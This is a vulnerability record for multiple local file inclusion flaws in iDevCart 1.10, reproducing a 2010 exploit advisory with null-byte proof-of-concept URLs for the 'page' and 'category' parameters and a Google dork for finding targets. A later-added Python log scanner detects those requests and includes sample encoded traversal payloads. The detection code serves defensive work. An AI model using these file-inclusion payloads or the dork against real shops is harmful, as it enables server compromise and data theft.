Vendor: iDevCart
By: v3n0m
CVSS: 9.3 (HIGH)
Type: Local File Inclusion
CWE: 98
Product Name: iDevCart
Affected Version From: 1.10
Affected Version To: 1.10
Patch Exists: NO
Related CWE: N/A
CPE: a:idevspot:idevcart:1.10
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

iDevSpot iDevCart 1.10 Multiple Local File Inclusion Vulnerabilities

iDevCart 1.10 is vulnerable to multiple local file inclusion vulnerabilities. An attacker can exploit these vulnerabilities to include arbitrary local files on the server, which can lead to remote code execution.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Exploit-DB raw data:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
 iDevSpot iDevCart 1.10 Multiple Local File Inclusion Vulnerabilities
-----------------------------------------------------------------------
Author  	: v3n0m (v3n0m666[at]live[dot]com)
Site    	: http://yogyacarderlink.web.id/
Date		: December, 24-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00

Application	: iDevCart
Price		: $49.95
Version		: 1.10 Other versions may also be affected
Vendor  	: http://www.idevspot.com/
Google Dorks	: "iDevCart 1.10 Shopping Cart Software"

Exploit & p0c
_____________

**[LFI]
http://127.0.0.1/[path]/index.php?page=[LFI]%00
http://127.0.0.1/[path]/index.php?page=browse&category=[LFI]%00
_________________________________________________

All YOGYACARDERLINK Crew & My Beloved Jovita Andy
_________________________________________________
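
Added example (not part of the original advisory and not iDevCart code): a log check for the two request patterns listed above. It flags `page` and `category` values sent to `index.php` that contain a null byte, a `..` segment or an absolute path after repeated percent-decoding. The Common Log Format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

WATCHED = ("page", "category")  # parameters named in the advisory
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request field, CLF assumed
CHECKS = (  # traits that no legitimate page or category name should have
    ("null-byte", re.compile(r"\x00")),
    ("traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("absolute-path", re.compile(r"^([\\/]|[A-Za-z]:[\\/])")),
)

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2500) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def reasons(value):
    """Return the names of every check the decoded value trips."""
    return [name for name, rx in CHECKS if rx.search(value)]

def scan(lines):
    """Return (line_number, parameter, reasons) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/index.php"):
            continue
        # parse_qsl decodes once; decode_fully handles further encoding layers
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            why = reasons(decode_fully(value)) if name in WATCHED else []
            if why:
                hits.append((number, name, why))
    return hits

# Constructed sample log lines (documentation addresses, made-up paths).
SAMPLE = [
    '203.0.113.5 - - [24/Dec/2010:10:00:01 +0700] "GET /shop/index.php?page=browse&category=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [24/Dec/2010:10:00:07 +0700] "GET /shop/index.php?page=..%2F..%2Fconstructed%2Ffile%00 HTTP/1.1" 200 812',
    '203.0.113.9 - - [24/Dec/2010:10:00:09 +0700] "GET /shop/index.php?page=browse&category=..%252F..%252Fconstructed%252Ffile%2500 HTTP/1.1" 200 812',
    '198.51.100.7 - - [24/Dec/2010:10:00:12 +0700] "GET /shop/images/logo.png HTTP/1.1" 200 2048',
]
```

Calling `scan(SAMPLE)` reports lines 2 and 3. A hit answered with status 200 deserves a closer look than one answered with an error.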